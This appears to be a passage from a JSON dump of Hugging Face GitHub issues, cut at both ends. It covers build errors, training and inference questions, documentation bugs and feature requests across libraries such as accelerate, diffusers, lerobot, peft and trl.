[rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/parallel/distributed.py\", line 1643, in forward\n [rank1]: else self._run_ddp_forward(*inputs, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/parallel/distributed.py\", line 1459, in _run_ddp_forward\n [rank1]: return self.module(*inputs, **kwargs) # type: ignore[index]\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n [rank1]: return self._call_impl(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n [rank1]: return forward_call(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/accelerate/utils/operations.py\", line 818, in forward\n [rank1]: return model_forward(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/accelerate/utils/operations.py\", line 806, in __call__\n [rank1]: return convert_to_fp32(self.model_forward(*args, **kwargs))\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/amp/autocast_mode.py\", line 44, in decorate_autocast\n [rank1]: return func(*args, **kwargs)\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/model/modeling_llada.py\", line 1582, in forward\n [rank1]: outputs = self.model.forward(\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/model/modeling_llada.py\", line 1479, in forward\n [rank1]: x, cache = block(x, attention_bias=attention_bias, layer_past=layer_past, use_ca", "url": "https://github.com/huggingface/accelerate/issues/3794", "state": "closed", "labels": [], "created_at": "2025-09-25T14:42:29Z", "updated_at": "2025-11-03T15:08:12Z", "comments": 1, "user": "adfad1" }, { "repo": "huggingface/text-embeddings-inference", "number": 728, "title": "Compile error in multiple environments for CPU backend", "body": "### System Info\n\nTEI source code: \n\n- Latest main branch(0c1009bfc49b759fe75eed4fd377b4fbad534ad5); \n- Latest release `v1.8.2`; \n- Release `v1.8.1`\n\nTested platform: \n\n- Win: AMD 7950X+Windows 10 x64 Version 10.0.19045.6332; \n- WSL2: AMD 7950X+Debian 13 on wsl2 (Linux DESKTOP 5.15.167.4-microsoft-standard-WSL2 # 1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 GNU/Linux) @ Windows 10 x64 Version 10.0.19045.6332; \n- Linux: Intel 6133*2+Ubuntu 20.04;\n\n(GPUs is not mentioned due to build TEI on CPU)\n\nTested rustup envs: \n\nFreshly installed rustup: default rustup profile: cargo 1.85.1 (d73d2caf9 2024-12-31)\n- Win: Freshly installed rustup & Freshly installed MSVC v143 -VS 2022 C++ build tools+Winodws 11 SDK (10.0.22621.0)+cmake\n- WSL: Freshly installed rustup & gcc (Debian 14.2.0-19) 14.2.0\n- Linux: Freshly installed rustup & gcc (GCC) 10.5.0\n\n### Information\n\n- [ ] Docker\n- [x] The CLI directly\n\n### Tasks\n\n- [x] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nAs docs' recommend, tested on 3 different envs listed above:\n\n1. `curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh`\n2. `cargo install --path router -F mkl --verbose` (added `--verbose` for logging)\n\nShows compile error about **25 undefined references / external symbol** (`'vsTanh', 'vsSub', 'vsSqrt', 'vsSin', 'vsMul', 'vsLn', 'vsFmin', 'vsExp', 'vsDiv', 'vsCos', 'vsAdd', 'vdTanh', 'vdSub', 'vdSqrt', 'vdSin', 'vdMul', 'vdLn', 'vdFmin', 'vdExp', 'vdDiv', 'vdCos', 'vdAdd', 'sgemm_', 'hgemm_', 'dgemm_'`)\n\n### Expected behavior\n\nExpect finishing compile, but:\n\n- Compile v1.8.2/v1.8.1/main (similar error) on Win+MSVC+AMD CPU:\n\n```\n...\nRunning `C:\\Users\\nkh04\\.rustup\\toolchains\\1.85.1-x86_64-pc-windows-msvc\\bin\\rustc.exe --crate-name text_embeddings_router --edition=2021 router\\src\\main.rs --error-format=json --json=diagnostic-rendered-ansi,artifacts,future-incompat --diagnostic-width=115 --crate-type bin --emit=dep-info,link -C opt-level=3 -C panic=abort -C lto=fat -C codegen-units=1 --cfg \"feature=\\\"candle\\\"\" --cfg \"feature=\\\"default\\\"\" --cfg \"feature=\\\"dynamic-linking\\\"\" --cfg \"feature=\\\"http\\\"\" --cfg \"feature=\\\"mkl\\\"\" --check-cfg cfg(docsrs,test) --check-cfg \"cfg(feature, values(\\\"accelerate\\\", \\\"candle\\\", \\\"candle-cuda\\\", \\\"candle-cuda-turing\\\", \\\"candle-cuda-volta\\\", \\\"default\\\", \\\"dynamic-linking\\\", \\\"google\\\", \\\"grpc\\\", \\\"http\\\", \\\"metal\\\", \\\"mkl\\\", \\\"ort\\\", \\\"python\\\", \\\"static-linking\\\"))\" -C metadata=e1406d246b8c925f --out-dir F:\\text-embeddings-inference-1.8.2\\target\\release\\deps -C strip=symbols -L dependency=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps --extern anyhow=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libanyhow-5751be73768123a3.rlib --extern axum=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libaxum-8bc59cf51b8d1ae2.rlib --extern axum_tracing_opentelemetry=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libaxum_tracing_opentelemetry-6919ca207315f42e.rlib --extern base64=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libbase64-20907aaabfa37a5c.rlib --extern clap=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libclap-ded1b8a7f6da29a7.rlib --extern futures=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libfutures-55e1ce906ca8ce43.rlib --extern hf_hub=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libhf_hub-46162d037bf61d01.rlib --extern http=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libhttp-721bb5a8d4ad5af4.rlib --extern init_tracing_opentelemetry=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libinit_tracing_opentelemetry-1130e5d6b02b3c83.rlib --extern intel_mkl_src=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libintel_mkl_src-7de47f7e38d141d5.rlib --extern metrics=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libmetrics-f38f63f59a9e401d.rlib --extern metrics_exporter_prometheus=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libmetrics_exporter_prometheus-3e83484daaaf9a40.rlib --extern mimalloc=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libmimalloc-55786f97dafb497c.rlib --extern num_cpus=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libnum_cpus-26f3f7fb7d16b825.rlib --extern opentelemetry=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libopentelemetry-43ce590757d45ebb.rlib --extern opentelemetry_otlp=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libopentelemetry_otlp-7adf99fb9a924955.rlib --extern opentelemetry_sdk=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libopentelemetry_sdk-48d11cd15d38a406.rlib --extern reqwest=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libreqwest-cdbb64c7917c22c9.rlib --extern serde=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libserde-e13a1b310cb83bc5.rlib --extern serde_json=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libserde_json-c2074a4721fb3f74.rlib --extern simsimd=F:\\text-embeddings-inference-1.8.2\\target\\release\\deps\\libsimsimd-5bf7050b419eab84.rlib --extern text_embeddings_bac", "url": "https://github.com/huggingface/text-embeddings-inference/issues/728", "state": "open", "labels": [ "documentation", "question" ], "created_at": "2025-09-25T11:52:16Z", "updated_at": "2025-11-18T14:49:01Z", "user": "nkh0472" }, { "repo": "huggingface/transformers", "number": 41141, "title": "Need a concise example of Tensor Parallelism (TP) training using Trainer/SFTTrainer.", "body": "### Feature request\n\nI have checked the code and there are few places which talk about TP. I saw from_pretrained method for model contains tp_plan and device_mesh. I also checked that the TrainingArgument can take parallelism_config which defines the TP/CP plan along with FSDP. However, I am not able to successfully stitch things together to make the only TP based training work. Please help.\n\nRef: \n- https://github.com/huggingface/transformers/blob/main/examples/3D_parallel.py\n\n### Motivation\n\nNeed to enable only TP based training, but no tutorial or example is available.\n\n### Your contribution\n\nGiven proper understanding and proper guidance, I can come up with clean example and documentation for the same.", "url": "https://github.com/huggingface/transformers/issues/41141", "state": "open", "labels": [ "Documentation", "Feature request", "Tensor Parallel" ], "created_at": "2025-09-25T03:01:02Z", "updated_at": "2026-01-04T14:05:36Z", "comments": 10, "user": "meet-minimalist" }, { "repo": "huggingface/lerobot", "number": 2034, "title": "dataset v2.1 and groot n1.5", "body": "for now, groot dose not support dataset v3.0 to fine_tune ? in this case, should we continue use v2.1 ? and if we already collect data from v3, how we can convert it back to v2.1?", "url": "https://github.com/huggingface/lerobot/issues/2034", "state": "open", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-09-24T21:12:26Z", "updated_at": "2025-12-24T00:05:45Z", "user": "zujian-y" }, { "repo": "huggingface/tokenizers", "number": 1868, "title": "How to set the cache_dir in the Rust implementation?", "body": "Hey, thank you for your great work with these tokenizers. \n\nWhen I use the tokenizers through the Python API via transformers, I can set a specific cache_dir like this \n```\nfrom transformers import AutoTokenizer\nself.tokenizer = AutoTokenizer.from_pretrained(self.tokenizer_name,cache_dir = self.cache_dir)\n```\n\nHow can I do that in Rust? How can I print the default cache dir (in Rust)?", "url": "https://github.com/huggingface/tokenizers/issues/1868", "state": "open", "labels": [], "created_at": "2025-09-24T18:50:38Z", "updated_at": "2025-10-06T04:25:46Z", "user": "sambaPython24" }, { "repo": "huggingface/diffusers", "number": 12386, "title": "Implement missing features on ModularPipeline", "body": "as i'm looking to take advantage of new `ModularPipeline` ask is to implement some currently missing features\n\nmy use case is to convert existing loaded model using standard pipeline into modular pipeline. that functionality was provided via #11915 and is now working.\n\nfirst minor obstacle is that modular pipeline does not have defined params for execution\nin standard pipeline i can inspect `__call__` signature to see which are allowed params\ni currently work around this using\n`possible = [input_param.name for input_param in model.blocks.inputs]`\nplease advise if this is acceptable\n\nsecond one is that modular pipelines don't seem to implement normal callbacks at all (e.g. `callback_on_step_end_tensor_inputs`? at the minimum we need some kind of callback functionality to capture interim latents on each step\n\nthird is more cosmetic - modular pipeline does implement `set_progress_bar_config`, but its not doing anything as its not implement on actual block (tested with `StableDiffusionXLModularPipeline`)\n\ncc @yiyixuxu @DN6 @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/12386", "state": "open", "labels": [ "roadmap" ], "created_at": "2025-09-24T15:49:23Z", "updated_at": "2025-09-29T05:46:29Z", "comments": 0, "user": "vladmandic" }, { "repo": "huggingface/candle", "number": 3096, "title": "[Question] Minimal documentation/example on including weights in compiled executable", "body": "Just what the title says: Is there a minimal code example on including weights in the compiled executable using include_bytes. Nervous to implement this without understanding best practices and end up with a suboptimal solution.", "url": "https://github.com/huggingface/candle/issues/3096", "state": "closed", "labels": [], "created_at": "2025-09-24T02:47:28Z", "updated_at": "2025-10-07T04:49:26Z", "comments": 1, "user": "bitanath" }, { "repo": "huggingface/optimum-executorch", "number": 149, "title": "Add documentation for how to run each type of exported model on ExecuTorch", "body": "Blocked on runner / multimodal runner work in ExecuTorch", "url": "https://github.com/huggingface/optimum-executorch/issues/149", "state": "open", "labels": [], "created_at": "2025-09-23T18:53:55Z", "updated_at": "2025-09-23T18:54:00Z", "user": "jackzhxng" }, { "repo": "huggingface/safetensors", "number": 653, "title": "`get_slice` is slow because it uses `tensors()` method instead of `info()`", "body": "### Feature request\n\nReplace \n```rust\nself.metadata.tensors().get(name)\n```\nwith\n```rust\nself.metadata.info(name)\n```\nin `get_slice` method\n\n### Motivation\n\nI noticed that the `get_slice` method of `Open` [does](https://github.com/huggingface/safetensors/blob/0816a1ae1d6b731cefd67f061d80d1cadd0dd7bb/bindings/python/src/lib.rs#L851) \n```rust\nself.metadata.tensors().get(name)\n````\ninstead of\n```rust\nself.metadata.info(name)\n```\nlike `get_tensor()` [does](https://github.com/huggingface/safetensors/blob/0816a1ae1d6b731cefd67f061d80d1cadd0dd7bb/bindings/python/src/lib.rs#L638) when retrieving `TensorInfo` by name.\n\nBecause of this, `get_slice` is much slower, since the `tensors()` method [reconstructs](https://github.com/huggingface/safetensors/blob/0816a1ae1d6b731cefd67f061d80d1cadd0dd7bb/safetensors/src/tensor.rs#L633) a new `HashMap` on each call.\n\nIs there any particular reason for this approach? Would it be possible to replace it with `self.metadata.info(name)` to improve performance?\n\n\n### Your contribution\n\nI do not mind doing a PR", "url": "https://github.com/huggingface/safetensors/issues/653", "state": "closed", "labels": [], "created_at": "2025-09-23T15:09:51Z", "updated_at": "2025-09-28T16:42:45Z", "comments": 1, "user": "PgLoLo" }, { "repo": "huggingface/diffusers", "number": 12375, "title": "What kernels should we integrate in Diffusers?", "body": "Now that we have an [integration](https://github.com/huggingface/diffusers/pull/12236) with the `kernels` lib to use Flash Attention 3 (FA3), it'd be nice to gather community interest about which kernels we should try to incorporate in the library through the [`kernels` lib](https://github.com/huggingface/kernels/). FA3 delivers a significant speedup on Hopper GPUs.\n\nI have done some work in the `kernelize` branch to see if replacing `GELU`, `SiLU`, and `RMSNorm` with their optimized kernels would have any speedups on Flux. So far, it hasn't had any. Benchmarking script: https://gist.github.com/sayakpaul/35236dd96e15d9f7d658a7ad11918411. One can compare the changes here: https://github.com/huggingface/diffusers/compare/kernelize?expand=1. \n\n> [!NOTE]\n> The changes in the `kernelize` branch are quite hacky as we're still evaluating things.\n\nPlease use this issue to let us know which kernels we should try to support in Diffusers. Some notes to keep in mind:\n\n* Layers where the `forward()` method is easily replaceable with the `kernelize()` [mechanism](https://github.com/huggingface/kernels/blob/main/docs/source/layers.md#kernelizing-a-model) would be prioritized. A reference is here: https://github.com/huggingface/transformers/pull/38205. \n* Even if a kernel isn't directly compatible with `kernels`, we can try to make it so, like we have for https://huggingface.co/kernels-community/flash-attn3.\n* Not all kernels contribute non-trivial gains in terms of speedup. So, please bear that in mind when proposing a kernel.\n\nCc: @MekkCyber", "url": "https://github.com/huggingface/diffusers/issues/12375", "state": "open", "labels": [ "performance" ], "created_at": "2025-09-23T09:03:13Z", "updated_at": "2025-09-30T06:56:39Z", "comments": 8, "user": "sayakpaul" }, { "repo": "huggingface/peft", "number": 2798, "title": "Add stricter type checking in LoraConfig for support with HfArgumentParser", "body": "### System Info\n\nSystem Info\ntransformers version: 4.57.0.dev0\nPlatform: Linux-5.14.0-284.73.1.el9_2.x86_64-x86_64-with-glibc2.39\nPython version: 3.12.3\nHuggingface_hub version: 0.34.4\nSafetensors version: 0.5.2\nAccelerate version: 1.10.1\nAccelerate config: not found\nDeepSpeed version: not installed\nPyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\nTensorflow version (GPU?): not installed (NA)\nFlax version (CPU?/GPU?/TPU?): not installed (NA)\nJax version: not installed\nJaxLib version: not installed\nUsing distributed or parallel set-up in script?: No\nUsing GPU in script?: No\nGPU type: NVIDIA A100-SXM4-80GB\npeft version: 0.17.1\n\n### Who can help?\n\n@benjaminbossan @githubnemo \n\n### Reproduction\n\n```\nfrom peft import LoraConfig\nfrom transformers import HfArgumentParser\n\np = HfArgumentParser(dataclass_types=LoraConfig) # fails\n```\n\n### Expected behavior\n\nI would expect LoraConfig to be supported by HfArgumentParser.\nAs I understand, this fails because HfArgumentParser does not support fields of type (`Optional[List[str], str]`).\n\nI had raised this in transformers as well, please refer [here](https://github.com/huggingface/transformers/issues/40915).\n\nCan we add stricter type checking for such fields so it can be easily integrated with other libraries and argument parsers?", "url": "https://github.com/huggingface/peft/issues/2798", "state": "closed", "labels": [], "created_at": "2025-09-23T05:19:34Z", "updated_at": "2025-09-23T12:37:47Z", "comments": 3, "user": "romitjain" }, { "repo": "huggingface/lerobot", "number": 1995, "title": "Questions about SmolVLA design", "body": "Hi! I am looking into the details of SmolVLA implementation, and got some questions.\n\nI wonder the following points are necessary, or beneficial for the performance.\n\n\n1.\nhttps://github.com/huggingface/lerobot/blob/f7283193ea9ae932423e3a1e27524a27fa5c0fe5/src/lerobot/policies/smolvla/smolvlm_with_expert.py#L354C63-L354C74\n\nIn the cross-attention layer, the VLM keys and values are linear-projected before the attention interface.\n\nThey have compatible shape without the projection, and ROPE is not applied after the projection (although ROPE is applied in the VLM part, interaction between the ROPEd queries and projected keys might not work as rotation?)\n\n\n2.\nhttps://github.com/huggingface/lerobot/blob/f7283193ea9ae932423e3a1e27524a27fa5c0fe5/src/lerobot/policies/smolvla/modeling_smolvla.py#L566\n\nhttps://github.com/huggingface/lerobot/blob/f7283193ea9ae932423e3a1e27524a27fa5c0fe5/src/lerobot/policies/smolvla/modeling_smolvla.py#L592C1-L593C1\n\nimage and text embeddings are multiplied by `sqrt(dim)` before they are fed to the llm and expert layers.\n\nI could not find the same multiplication in SmolVLM modeling (https://github.com/huggingface/transformers/blob/main/src/transformers/models/smolvlm/modeling_smolvlm.py)\n\nI guess that this multiplication might change the distribution of image-text features.\n\n3.\nSmolVLM and SmolVLA are trained with different ROPE max frequency.\n\nIt seems like SmolVLM is trained with 100_000, and SmolVLA is trained with 10_000.\n\n4.\nIt seems like SmolVLM uses causal mask for all LLM layers. (no bidirectional attention for images)\n\nSmolVLA uses similar mask with PI0 (paligemma).\n", "url": "https://github.com/huggingface/lerobot/issues/1995", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-09-22T11:53:01Z", "updated_at": "2025-10-17T01:58:12Z", "user": "gliese581gg" }, { "repo": "huggingface/lerobot", "number": 1994, "title": "How to improve success rate and generalization", "body": "Hi, I have one question regarding the success rate, if I ensure the object appears in the frame of wrist camera at the beginning of dataset collection/inference, will this lead to higher success rate for pick and place task?\n\nMy initial attempt was object appears in the side view camera but does not appear in the wrist camera at the initial point/ beginning of dataset collection/inference.\n\n**Should I ensure object appears in both side view camera and wrist camera at the starting point of program?**", "url": "https://github.com/huggingface/lerobot/issues/1994", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-09-22T09:55:53Z", "updated_at": "2025-09-23T09:26:16Z", "user": "Liu9999ai" }, { "repo": "huggingface/smol-course", "number": 248, "title": "[QUESTION] About applying chat template for base model via `clone_chat_template` from trl", "body": "In the course [Supervised Fine-Tuning](https://huggingface.co/learn/smol-course/unit1/3), author uses base model `HuggingFaceTB/SmolLM3-3B-Base` but I choose `HuggingFaceTB/SmolLM2-135M` because it is lighter. However, I found that the base model `SmolLM2-135M` does not have its own chat template but it already had special tokens. However, speical tokens may be incorrect, for example, bos_token and eos_token share the same token `<|endoftext|>`\n\n\"Image\"\n\nI also refer to course [LLM Course, Fine-Tuning with SFTTrainer](https://huggingface.co/learn/llm-course/en/chapter11/3?fw=pt#implementation-with-trl) and author uses `setup_chat_format` to create the chat template for base model's tokenizer which does not have its own chat template\n\nHowever, [`setup_chat_format`](https://github.com/huggingface/trl/blob/86f74b486fda475e5530a451d06b835361d959ac/trl/models/utils.py#L87) only supports `chatml` format and will be deprecated in trl version 0.26.0. That is why I use [`clone_chat_template`](https://github.com/huggingface/trl/blob/86f74b486fda475e5530a451d06b835361d959ac/trl/models/utils.py#L165) instead.\n\nBut another issue appears here: while `clone_chat_template` only overwrites eos from source tokenizer to target tokenizer, the `setup_chat_format` overwrites all bos, eos, and pad tokens. After I try to clone `Llama-3.2-Instruct`'s chat template, only eos changes to `<|eot_id|>`\n\n`model, tokenizer, added_tokens = clone_chat_template(model=model, tokenizer=tokenizer, source_tokenizer_path='meta-llama/Llama-3.2-1B-Instruct')`\n\n\"Image\"\n\nQuestion:\n1. Why in the base model, although the tokenizer does not have a chat template, it already has special tokens?\n2. `clone_chat_template` does not overwrite all special tokens like bos, eos, pad, ... so are there any training SFT impacts, and what is the solution for this?\n\nI am new to SFT and I very appreciate any support. Thank you.\n ", "url": "https://github.com/huggingface/smol-course/issues/248", "state": "open", "labels": [ "question" ], "created_at": "2025-09-22T03:03:56Z", "updated_at": "2025-09-22T19:13:17Z", "user": "binhere" }, { "repo": "huggingface/transformers.js", "number": 1419, "title": "Why is `token-classification` with T5 not available? (`T5ForTokenClassification`)", "body": "### Question\n\nIn python `tranformers` i can do:\n```python\nmodel = AutoModelForTokenClassification.from_pretrained(\"google-t5/t5-base\")\n```\nand use it with `Trainer` to train it (quite successfully).\nOr\n```python\nclassifier = pipeline(\"token-classification\", model=\"google-t5/t5-base\")\n```\nand use it for token classification.\n\nInstead, if I try to use it in `transformers.js` (web, 3.7.3):\n```js\nclassifier = await pipeline('token-classification', \"google-t5/t5-base\")\n```\nI receive this error:\n```\nUnsupported model type: t5\n```\n\nHow come? Or there is another way to use T5 for token classification in javascript?\n", "url": "https://github.com/huggingface/transformers.js/issues/1419", "state": "open", "labels": [ "question" ], "created_at": "2025-09-21T23:30:22Z", "updated_at": "2025-09-24T21:42:56Z", "user": "debevv" }, { "repo": "huggingface/transformers.js", "number": 1418, "title": "EmbeddingGemma usage", "body": "### Question\n\nI'm new to transformers.js \nI want to use embeddinggemma into my web app and I've looked at the example on its usage at this link:\nhttps://huggingface.co/blog/embeddinggemma#transformersjs\n\nAt the same time I've seen a different code, using pipeline, regarding embeddings:\nhttps://huggingface.co/docs/transformers.js/api/pipelines#pipelinesfeatureextractionpipeline\n\nI'm trying to create a custom pipeline and in typescript I'm building the pipeline like\n\n```ts\nclass EmbeddingPipeline {\n private static instance: Promise | null = null;\n private static model = 'onnx-community/embeddinggemma-300m-ONNX';\n private static readonly task = 'feature-extraction';\n\n // Device rilevato (default wasm)\n private static device: 'webgpu' | 'wasm' = 'wasm';\n private static deviceInitPromise: Promise | null = null;\n\n private static async detectDeviceOnce(): Promise {\n if (this.deviceInitPromise) return this.deviceInitPromise;\n this.deviceInitPromise = (async () => {\n if (typeof navigator !== 'undefined' && 'gpu' in navigator) {\n try {\n const adapter = await (navigator as any).gpu.requestAdapter();\n if (adapter) {\n this.device = 'webgpu';\n return;\n }\n } catch {\n // ignore, fallback to wasm\n }\n }\n this.device = 'wasm';\n })();\n return this.deviceInitPromise;\n }\n\n static getSelectedDevice(): 'webgpu' | 'wasm' {\n return this.device;\n }\n\n static async getInstance(progress_callback?: ProgressCallback): Promise {\n if (this.instance) return this.instance;\n\n // Rileva device una sola volta\n await this.detectDeviceOnce();\n\n const build = async (device: 'webgpu' | 'wasm') =>\n pipeline(\n this.task,\n this.model,\n {\n progress_callback,\n dtype: 'q8',\n device\n }\n ) as Promise;\n\n this.instance = (async (): Promise => {\n try {\n return await build(this.device);\n } catch (e) {\n if (this.device === 'webgpu') {\n // Fallback automatico a wasm\n this.device = 'wasm';\n return await build('wasm');\n }\n throw e;\n }\n })();\n\n return this.instance;\n }\n}\n\n\nconst getEmbeddingDevice = () => EmbeddingPipeline.getSelectedDevice();\nconst embedding_prefixes_per_task: Record = {\n 'query': \"task: search result | query: \",\n 'document': \"title: none | text: \",\n};\n\nexport type EmbeddingTask = 'query' | 'document';\n\nexport const getEmbedding = async (task: EmbeddingTask, text: string): Promise => {\n const extractor = await EmbeddingPipeline.getInstance();\n\n const prefix = embedding_prefixes_per_task[task];\n const result = await extractor(`${prefix}${text}`, { pooling: 'mean', normalize: true });\n\n return result.data as Float32Array;\n};\n```\n\nI'm using the same sentences (with prefixes) used by your example (I'm running both my class and your code to be sure if they matches) and the embedding result is different.\n\nWhat am I doing wrong? Do you have any reference to some proper docs reference that explain properly how this works?\n\nThanks", "url": "https://github.com/huggingface/transformers.js/issues/1418", "state": "open", "labels": [ "question", "v4" ], "created_at": "2025-09-21T10:26:22Z", "updated_at": "2025-11-08T15:33:16Z", "user": "MithrilMan" }, { "repo": "huggingface/diffusers", "number": 12359, "title": "Chroma pipeline documentation bug regarding the `guidance_scale` parameter", "body": "### Describe the bug\n\nFrom my understanding, Chroma is a retrained and dedistilled version of the Flux architecture, so it uses true CFG, unlike Flux. I can indeed confirm that this is true by tracing through the source code. \nHowever, currently the documentation for the `guidance_scale` parameter in the `ChromaPipeline.__call__()` method mentions otherwise, presumably because it was copied over from the `FluxPipeline` documentation. \n\n### Reproduction\n\nThe current documentation for the `guidance_scale` parameter in the `ChromaPipeline.__call__()` method:\n```python\n'''\nguidance_scale (float, optional, defaults to 3.5) \u2014 Embedded guiddance scale is enabled by setting guidance_scale > 1. Higher guidance_scale encourages a model to generate images more aligned with prompt at the expense of lower image quality.\nGuidance-distilled models approximates true classifer-free guidance for guidance_scale > 1. Refer to the [paper](https://huggingface.co/papers/2210.03142) to learn more.\n'''\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.36.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.11.9\n- PyTorch version (GPU?): 2.7.1+cu128 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.4\n- Transformers version: 4.55.0\n- Accelerate version: 1.10.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: 0.47.0\n- Safetensors version: 0.6.2\n- xFormers version: 0.0.31.post1\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n- Using GPU in script?: No\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@stevhliu ", "url": "https://github.com/huggingface/diffusers/issues/12359", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-21T08:34:15Z", "updated_at": "2025-09-22T20:04:15Z", "comments": 1, "user": "mingyi456" }, { "repo": "huggingface/trl", "number": 4110, "title": "How does `trl` know what part of dataset is prompt and completion in the following situation?", "body": "### Reproduction\n\n```python\nimport torch\nimport trl as r\nimport peft as p\nimport datasets as d\nimport accelerate as a\nimport transformers as t\n\nallowed_entities = ['AGE', 'EYECOLOR', 'GENDER', 'HEIGHT', 'WEIGHT', 'SEX']\nentity_mapping = {\n \"ACCOUNTNAME\": \"account_name\",\n \"ACCOUNTNUMBER\": \"account_number\",\n \"AGE\": \"age\",\n \"AMOUNT\": \"amount\",\n \"BIC\": \"bic\",\n \"BITCOINADDRESS\": \"bitcoin_address\",\n \"BUILDINGNUMBER\": \"building_number\",\n \"CITY\": \"city\",\n \"COMPANYNAME\": \"company_name\",\n \"COUNTY\": \"county\",\n \"CREDITCARDCVV\": \"credit_card_cvv\",\n \"CREDITCARDISSUER\": \"credit_card_issuer\",\n \"CREDITCARDNUMBER\": \"credit_card_number\",\n \"CURRENCY\": \"currency\",\n \"CURRENCYCODE\": \"currency_code\",\n \"CURRENCYNAME\": \"currency_name\",\n \"CURRENCYSYMBOL\": \"currency_symbol\",\n \"DATE\": \"date\",\n \"DOB\": \"dob\",\n \"EMAIL\": \"email\",\n \"ETHEREUMADDRESS\": \"ethereum_address\",\n \"EYECOLOR\": \"eye_color\",\n \"FIRSTNAME\": \"first_name\",\n \"GENDER\": \"gender\",\n \"HEIGHT\": \"height\",\n \"IBAN\": \"iban\",\n \"IP\": \"ip\",\n \"IPV4\": \"ipv4\",\n \"IPV6\": \"ipv6\",\n \"JOBAREA\": \"job_area\",\n \"JOBTITLE\": \"job_title\",\n \"JOBTYPE\": \"job_type\",\n \"LASTNAME\": \"last_name\",\n \"LITECOINADDRESS\": \"litecoin_address\",\n \"MAC\": \"mac\",\n \"MASKEDNUMBER\": \"masked_number\",\n \"MIDDLENAME\": \"middle_name\",\n \"NEARBYGPSCOORDINATE\": \"nearby_gps_coordinate\",\n \"ORDINALDIRECTION\": \"ordinal_direction\",\n \"PASSWORD\": \"password\",\n \"PHONEIMEI\": \"phone_imei\",\n \"PHONENUMBER\": \"phone_number\",\n \"PIN\": \"pin\",\n \"PREFIX\": \"prefix\",\n \"SECONDARYADDRESS\": \"secondary_address\",\n \"SEX\": \"sex\",\n \"SSN\": \"ssn\",\n \"STATE\": \"state\",\n \"STREET\": \"street\",\n \"TIME\": \"time\",\n \"URL\": \"url\",\n \"USERAGENT\": \"user_agent\",\n \"USERNAME\": \"username\",\n \"VEHICLEVIN\": \"vehicle_vin\",\n \"VEHICLEVRM\": \"vehicle_vrm\",\n \"ZIPCODE\": \"zip_code\"\n}\n\ndef formatting_function(x):\n entities = []\n for entity in x['privacy_mask']:\n if entity['label'] not in allowed_entities:\n entities.append({'value': entity['value'], 'label': entity_mapping[entity['label']]})\n prompt = f\"Extract all the personal information from the following text and classify it: {x['source_text']}\"\n completion = str(entities)\n return {\"text\": f\"### PROMPT\\n{prompt}\\n\\n### COMPLETION\\n{completion}\"}\n\ndef main():\n model_name = \"Qwen/Qwen3-0.6B\"\n dataset_name = \"ai4privacy/pii-masking-200k\"\n\n quantization = False\n quantization_bits = \"8\"\n lora = True\n lora_rank = 8\n lora_alpha = 16\n lora_dropout = 0.05\n use_mixed_precision = True\n # Training parameters\n completion_only_loss = True\n output_dir = f\"/scratch/bminesh-shah/phi-ner/{model_name.replace('/', '-')}_pii_finetuned_prompt_completion\"\n learning_rate = 1e-4\n num_train_epochs = 10\n per_device_train_batch_size = 2\n gradient_accumulation_steps = 8\n\n accelerator = a.Accelerator()\n\n dataset = d.load_dataset(dataset_name)\n dataset = dataset.filter(lambda x: x['language'] == 'en')\n dataset = dataset.remove_columns(['target_text', 'span_labels', 'mbert_text_tokens', 'mbert_bio_labels', 'id', 'language', 'set'])\n dataset = dataset['train']\n dataset = dataset.train_test_split(test_size=0.2, seed=24, 